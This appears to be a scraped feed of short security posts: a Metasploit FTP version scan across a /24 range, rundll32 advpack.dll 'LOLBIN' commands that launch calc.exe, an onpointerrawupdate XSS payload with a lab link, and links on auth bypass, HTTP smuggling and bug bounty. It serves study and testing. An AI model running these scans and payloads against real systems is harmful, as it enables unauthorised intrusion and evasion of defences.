detect the version of the target FTP server:
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS xx.xx.xx.xx/24
msf auxiliary(ftp_version) > set THREADS 256
msf auxiliary(ftp_version) > run
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS xx.xx.xx.xx/24
msf auxiliary(ftp_version) > set THREADS 256
msf auxiliary(ftp_version) > run
Stay positive Lolbins... not!
http://hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/
#LOLBIN
rundll32 advpack.dll, RegisterOCX calc.exe
rundll32 advpack.dll, #12 calc.exe
rundll32 advpack.dll, #+12 calc.exe
rundll32 advpack.dll, #-4294967284 calc.exe
http://hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/
#LOLBIN
rundll32 advpack.dll, RegisterOCX calc.exe
rundll32 advpack.dll, #12 calc.exe
rundll32 advpack.dll, #+12 calc.exe
rundll32 advpack.dll, #-4294967284 calc.exe
Very useful tool if you are studying Drivers.
https://github.com/zodiacon/DriverMon
Also really enjoyed the book:
Windows Kernel Programming
https://leanpub.com/windowskernelprogramming
https://github.com/zodiacon/DriverMon
Also really enjoyed the book:
Windows Kernel Programming
https://leanpub.com/windowskernelprogramming
GitHub
GitHub - zodiacon/DriverMon: Monitor activity of any driver
Monitor activity of any driver. Contribute to zodiacon/DriverMon development by creating an account on GitHub.
<div onpointerrawupdate=alert(1) style=width:100%;height:100%;position:absolute;background-color:red>test
http://portswigger-labs.net/xss/xss.php?x=%3Cdiv%20onpointerrawupdate=alert(1)%20style=width:100%;height:100%;position:absolute;background-color:red%3Etest
http://portswigger-labs.net/xss/xss.php?x=%3Cdiv%20onpointerrawupdate=alert(1)%20style=width:100%;height:100%;position:absolute;background-color:red%3Etest
OK Google: bypass the authentication!
https://techblog.mediaservice.net/2020/01/ok-google-bypass-the-authentication
Escalating reflected XSS with HTTP Smuggling
https://hazana.xyz/posts/escalating-reflected-xss-with-http-smuggling
Hyperlink Injection - Easy Money (sometimes) by @abhishake100
https://link.medium.com/gw16BqBeU3
#bugbounty
https://techblog.mediaservice.net/2020/01/ok-google-bypass-the-authentication
Escalating reflected XSS with HTTP Smuggling
https://hazana.xyz/posts/escalating-reflected-xss-with-http-smuggling
Hyperlink Injection - Easy Money (sometimes) by @abhishake100
https://link.medium.com/gw16BqBeU3
#bugbounty